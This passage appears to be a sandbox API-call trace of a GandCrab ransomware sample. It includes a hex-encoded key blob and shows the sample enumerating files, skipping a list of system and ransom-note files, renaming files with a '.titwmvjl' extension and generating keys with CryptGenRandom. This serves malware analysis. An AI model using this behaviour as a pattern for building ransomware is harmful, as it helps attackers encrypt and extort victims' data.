a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0079.735] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0079.736] CloseHandle (hObject=0x2bc) returned 1 [0079.736] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.736] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.736] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x19, wMilliseconds=0x2e)) [0079.737] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.737] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0079.737] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0079.737] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\d2ca4a09d2ca4deb61a.lock") returned 79 [0079.737] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\uproof\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0079.738] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.738] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.738] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\") returned 55 [0079.738] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\*" [0079.738] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5035b8 [0079.738] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.738] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.739] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.739] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.739] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.739] lstrcmpW (lpString1="CUSTOM.DIC", lpString2=".") returned 1 [0079.739] lstrcmpW (lpString1="CUSTOM.DIC", lpString2="..") returned 1 [0079.739] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\", lpString2="CUSTOM.DIC" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" [0079.739] lstrlenW (lpString=".titwmvjl") returned 9 [0079.739] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned 65 [0079.739] VirtualAlloc (lpAddress=0x0, dwSize=0xc2, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.739] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.titwmvjl") returned 74 [0079.739] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned 65 [0079.739] lstrlenW (lpString=".DIC") returned 4 [0079.739] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.739] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".DIC ") returned 5 [0079.739] lstrcmpiW (lpString1=".DIC", lpString2=".titwmvjl") returned -1 [0079.739] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.740] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned 65 [0079.740] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned 65 [0079.740] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="desktop.ini") returned -1 [0079.740] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="autorun.inf") returned 1 [0079.740] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="ntuser.dat") returned -1 [0079.740] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="iconcache.db") returned -1 [0079.740] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="bootsect.bak") returned 1 [0079.740] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="boot.ini") returned 1 [0079.740] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="ntuser.dat.log") returned -1 [0079.740] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="thumbs.db") returned -1 [0079.740] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0079.740] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0079.740] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="KRAB-DECRYPT.html") returned -1 [0079.740] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="CRAB-DECRYPT.html") returned 1 [0079.740] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="KRAB-DECRYPT.txt") returned -1 [0079.740] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="CRAB-DECRYPT.txt") returned 1 [0079.740] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="ntldr") returned -1 [0079.740] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="NTDETECT.COM") returned -1 [0079.740] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="Bootfont.bin") returned 1 [0079.740] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned 65 [0079.740] lstrlenW (lpString=".DIC") returned 4 [0079.740] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.740] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".DIC ") returned 5 [0079.741] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.741] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.741] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0079.741] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0079.741] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.742] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0079.744] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.745] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.745] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.745] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0079.745] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.745] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.745] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.745] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.745] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0079.748] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.748] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.748] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 